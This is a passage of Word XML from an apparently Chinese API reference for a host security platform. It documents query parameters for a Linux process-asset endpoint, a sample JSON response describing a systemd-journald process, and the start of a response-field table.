        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="465406ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="209A9B86" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="664D2CF5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>包名,仅linux可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0ACFA225" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B56A176" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>packageVersions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="457D1A63" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B6A1ECE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="612CB2AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>包版本列表,仅linux可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="256D0632" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A8C0C41" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>installedByPm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49BEF6E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E12B4DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EB15DEC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否包安装进程 ,仅linux可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="09D2B9D2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62936F86" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pids</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D2A4CD5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AD26975" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2524A4CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4C35266E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="742F57FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="574FC001" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2985D5A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E617794" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程状态,仅linux可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="51BC2DAE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E10369C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F0BC0AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40EBD463" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="323FB980" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程路径（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7254E30B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B313F4F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>uname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B567E08" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="702DEBEB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CC08FAE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户名（Linux模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="76E201B3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D971F39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>gname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69959BDB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B890BB5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4392EEDA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户组名（模糊查询）,仅linux可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="78E38B36" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57682E6E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52CA1C49" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EABECB2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14A429C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程名（模糊查询)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5977F413" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C60813D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>startArgs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D4AED48" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E7DC11E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29666D33" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程启动参数（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6E718618" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69DB5FBB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>tty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FF4792E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00D990F0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3599F5A5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程启动的TTY（模糊查询），仅linux可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="78D76028" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14323325" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64E0BF9F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D2424E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EA8B293" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程描述（模糊查询），仅windows可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3D2FD84B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7990C58E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>types</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41F7CF7F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AE01F2A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63187AE7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程类型查询(其中：1-表示应用程序 2-表示后台程序 3-表示windows进程)），仅windows可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F89900E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B686EFD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/process/linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407683CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAB298A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId":"70db8ef89e9ae79a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp":"172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp":"172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp":"172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId":39,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroup":"qingteng",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "test-test000",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "tmp"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname":"qingteng",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "name":"systemd-journal",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "pid":246,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "path":"/lib/systemd/systemd-journald",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "startArgs":"/lib/systemd/systemd-journald",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "state":"S",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "uname":"root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "uid":0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "gname":"root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "tty":"?",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "startTime":"2018-03-30 13:55:45",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "portCount":0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "md5":"6d8a3cd92c02ba9ce4a1e677dbf23462",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "installByPm":true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "packageVersion":"229-4ubuntu17",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "packageName":"systemd",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "gid":0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "root":true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "dependencies":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "description":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "version":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "groups":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "type":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "sessionId":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "sessionName":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "size":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "ppid":1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A655359"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745"/>
        <w:gridCol w:w="1181"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="5611"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4AEF114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C3B4A5C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79A07AC5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C92BF1F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44BABCF0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7115F02C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50761B85" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E0A9189" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="567E14E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DF4BD7B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agent uuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3234ABA3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71ABB5AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6365AB0D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E5FFFA4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53DF2253" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>显示IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4DE8F79C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29A94BC1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ECC0626" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
